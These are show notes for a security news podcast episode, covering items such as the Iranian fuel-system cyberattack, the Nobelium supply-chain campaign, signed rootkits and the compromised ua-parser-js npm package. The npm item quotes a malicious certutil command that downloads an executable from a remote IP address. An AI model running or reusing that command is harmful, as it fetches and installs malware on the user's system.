Iranian Gas, Smelly Towns, View Source Legality, EBCDIC & GDPR, & Unlocking Oculus Go – PSW #716
This week in the Security News we talk: Its still not illegal to look at HTML source code, Nobelium strikes again, npm infections, gas is cheap in Iran, if you can get it, Google Tensor, going beyond the transport layer with HTTPS, buying a power plan, EBCDIC and GDPR, how children can infect parents, signing your rootkit, dates are hard, something smells funny and bird poop in your antenna, & more!
Announcements
Don't forget to check out our library of on-demand webcasts & technical trainings at securityweekly.com/ondemand.
Hosts
Paul Asadoorian
Principal Security Evangelist at Eclypsium
- 1. FBI Raids Chinese Point-of-Sale Giant PAX Technology – Krebs on Security
- 2. Apple Patches Critical iOS Bugs; One Might Be Under Attack
- 3. Squirrel Bug Lets Attackers Execute Code in Games, Cloud Services
- 4. How hackers hijacked thousands of high-profile YouTube accounts
- 5. SALAD SHOOTER: June 1963: Discovery of the Cosmic Microwave Background"Take the case of Bell Labs physicists Arno Penzias and Robert Wilson, who set out to map radio signals from the Milky Way and wound up being the first to measure the cosmic background radiation (CMB). Their momentous discovery made it possible to obtain information about cosmic processes that took place about 14 billion years ago, and forever changed the science of cosmology, transforming it from a specialty of a select few astronomers to a "respectable" branch of physics almost overnight." All stemmed from me watching this video, as part of my son's homework! https://www.youtube.com/watch?v=hcds5Ob59Dg - Also interesting is that they started to look into interference for some of the first satellite phones. They cleaned bird poop out of the antenna as a potential source of interference. 1% of the static on your TV with an antenna if you tune in between the channels, comes from residual big bang microwave radiation.
- 6. 70% of WiFi Network Samples Cracked in a WiFi Network Cracking Experiment
- 7. Pixel 6: Setting a new standard for mobile securityI can't wait: "The Google Tensor security core is a custom designed security subsystem dedicated to the preservation of user privacy. It's distinct from the application processor, not only logically, but physically, and consists of a dedicated CPU, ROM, one-time-programmable (OTP) memory, crypto engine, internal SRAM, and protected DRAM. For Pixel 6 and 6 Pro, the security core’s primary use cases include protecting user data keys at runtime, hardening secure boot, and interfacing with Titan M2TM."
- 8. Why I think all budding ethical hackers should take CS50x or learn some bit of Computer Science.
- 9. HTTPS Attestable (HTTPA) Protocol – Enhancing HTTPS SecurityI really think of HTTPS as protecting the transport layer, however, Intel is proposing extending it as: "“HTTPS cannot provide security assurances on the request data in compute, so the computing environment remains uncertain risks and vulnerabilities."
- 10. Malicious Firefox Add-ons Block Browser From Downloading Security UpdatesWe need some further restrictions on what add-ons can do: "The two extensions in question, named Bypass and Bypass XM, "interfered with Firefox in a way that prevented users who had installed them from downloading updates, accessing updated blocklists, and updating remotely configured content,""
- 11. SolarWinds hackers, Nobelium, once again strike global IT supply chains, Microsoft warns
- 12. North Korea Linked Lazarus APT Now Targets the IT supply chain. – CyberWorkx
- 13. Iranian gas stations out of service after distribution network hackedFirst, like wow: "According to media reports, the “cyberattack 64411” message appeared to customers that tried to get subsidized fuel at 5 cents a liter or 20 cents a gallon using government-issued cards." Also, a coordinated attack: "As news spread about the NIOPDC distribution network being under attack, digital billboards in multiple cities in Iran started to show messages reading “Khamenei! Where's our fuel?” and “Free fuel in Jamaran station.”" and this LOL: " Iranian state television confirned the reports of a cyberattack hitting gas stations and Iran's Supreme Council of Cyberspace believes the incident is state-sponsored, although it is early to say which country is behind it." - Gee I wonder who?
- 14. Azure AD Default Configuration Blunders
- 15. Bitcoin-mining power plant raises ire of environmentalists"Greenidge Generation runs a once-mothballed plant near the shore of Seneca Lake in the Finger Lakes region to produce about 44 megawatts to run 15,300 computer servers, plus additional electricity it sends into the state’s power grid. The megawatts dedicated to Bitcoin might be enough electricity to power more than 35,000 homes."
- 16. EBCDIC is incompatible with GDPRSo, the bank could not spell a customer's name correctly, due to diacritical marks. The customer filed a GDPR complaint under Article 16 ("The data subject shall have the right to obtain from the controller without undue delay the rectification of inaccurate personal data concerning him or her."). The bank says this is impossible because, get this, the system they use only supports EBCDIC!
- 17. PHP-FPM local root vulnerabilityThis, THIS is why I hate parent processes running as root and child processes running with lower privileges: "A low-privilege process can read and write an array of pointers used by the main process, running as root, through shared memory. An attacker can leverage this problem to change a 32-bit integer from zero to one in the main process's memory, or clear a memory region. By leveraging the primitive multiple times, it is possible to reach another bug, make the main process execute code, and thus escalate privileges."
- 18. Breaking the News: New York Times Journalist Ben Hubbard Hacked with Pegasus after Reporting on Previous Hacking Attempts – The Citizen Lab
- 19. Security issue: compromised npm packages of ua-parser-js (0.7.29, 0.8.0, 1.0.0) – Questions about deprecated npm package ua-parser-js · Issue #536 · faisalman/ua-parser-jsYikes: "certutil -rulcache -f http://159.148.186.228/download/jsextension.exe jsextension.exe"
- 20. Digitally-Signed Rootkits are Back – A Look at FiveSys and CompanionsI really want to know how this works: "For the past few months, Bitdefender researchers have seen a surge in malicious drivers with valid digital signatures issued through the WHQL signing process. This research focuses on FiveSys – a digitally signed rootkit that made its way through the driver certification process." - The whitepaper does not really say, unless I missed it, how the attackers managed this: "The reason for this might be the new Driver Signing requirements from Microsoft, which demand drivers to be digitally signed by Microsoft before acceptance by the operating system. This new requirement ensures that all drivers are validated and signed by the operating system vendor rather than the original developer and, as such, digital signatures offer no indication as to the identity of the real developer. It seems that malware writers managed to work around the new requirements, as Netflter and new FiveSys demonstrated."
- 21. CISA warns of GPS bug that may roll back dates by 1,024 weeks, to March 2002Coding dates and time is hard: https://gitlab.com/gpsd/gpsd/-/issues/144 - Looks like in accounting for leap year they created a time machine: "trigger a 1024 week backward time jump from Saturday October 16, 2021 to Sunday March 3, 2002".
Jeff Man
Sr. InfoSec Consultant at Online Business Sytems
Larry Pesce
Product Security Research and Analysis Director at Finite State
- 1. Add Mycelium To Your Mesh Networks
- 2. FBI Releases Indicators of Compromise Associated with Ranzy Locker Ransomware
- 3. Cracking WiFi at Scale with One Simple Trick
- 4. Unlocking Oculus Go
- 5. Copyleft Compliance Projects – Software Freedom Conservancy
- 6. SS7 Attack Panel: Yet Another Rising SCAM on Social Media
- 7. California town? This could be the studio…SQUIRREL! I love this industry... it is the only one I know of where you can mention snort, vomit and burp and not be talking about a bodily function.
Lee Neely
Senior Cyber Advisor at Lawrence Livermore National Laboratory
- 1. Viewing website HTML code is not illegal or “hacking,” prof. tells Missouri gov.The cybersecurity professor who helped uncover the Missouri government's failure to protect teachers' Social Security numbers has demanded that the state cease its investigation into him and stop making "baseless accusations" that he committed a crime. Khan hired an attorney to defend himself against the state's accusations. On Thursday last week, Khan's attorney sent a litigation hold and demand letter to Parson and several state agencies. The letter says that Parson and other state officials defamed Khan and violated his First Amendment "right to speak freely without the threat of government retaliation." The letter adds the Show Me State's investigation into Khan "would violate the prohibition on malicious prosecution." "Professor Khan is likely to prevail on the merits of any case brought against him," the letter said. "No statute in Missouri or on the federal level prohibits members of the general public from viewing publicly available websites or viewing the website's unencrypted source code. No reasonable person would think they were unauthorized to view a publicly available website, its unencrypted source code, or any of the unencrypted translations of that source code. There is no probable cause to investigate Professor Khan, and instigation or continuation of any proceeding against him would therefore be prohibited."
- 2. SolarWinds hackers, Nobelium, once again strike global IT supply chains, Microsoft warnsMicrosoft has issued a warning to organizations that the "Nobelium" hacking group behind the SolarWinds attacks has targeted some 140 technology service providers and resellers as part of a global IT supply chain attack.
- 3. Another popular npm package infected with malwareIn an audacious incident, threat actors hijacked the account of the developer of a widely used JavaScript library, UAParser.ja, to replace the legitimate code with malicious one infused with malware and trojans.
- 4. TodayZoo phishing kit borrows the code from other kitsResearchers say they have discovered a series of credential phishing campaigns in which hackers are leveraging a phishing kit dubbed "TodayZoo" that uses large portions of code lifted from various other phishing kits in order to steal credentials. According to Microsoft, TodayZoo was first identified in December 2020 and includes portions of code such as comment markers, dead links, and other elements found in other, previous phishing kits.
- 5. Groove ransomware calls on all extortion gangs to attack US interestsThe Groove ransomware gang is calling on other extortion groups to attack US interests after law enforcement took down REvil's infrastructure last week. Over the weekend, BleepingComputer reported that the REvil ransomware operation shut down again after an unknown third party hijacked their dark web domains.
- 6. Iran says cyberattack closes gas stations across countryA cyberattack crippled gas stations across Iran on Tuesday, leaving angry motorists stranded in long lines. No group immediately claimed responsibility for the attack, which rendered useless the government-issued electronic cards that many Iranians use to buy subsidized fuel at the pump.
- 7. Unknown ransomware gang uses SQL injection bug in BillQuick Web Suite to deploy ransomwareAn unknown ransomware gang leverages a critical SQL injection flaw in the BillQuick Web Suite time and billing solution to deploy ransomware. An unknown ransomware gang is exploiting a critical SQL injection flaw, tracked as CVE-2021-42258, in the popular billing software suite BillQuick Web Suite time to deploy ransomware.
Tyler Robinson
Director of Offensive Security & Research at Trimarc Security, Founder & CEO at Dark Element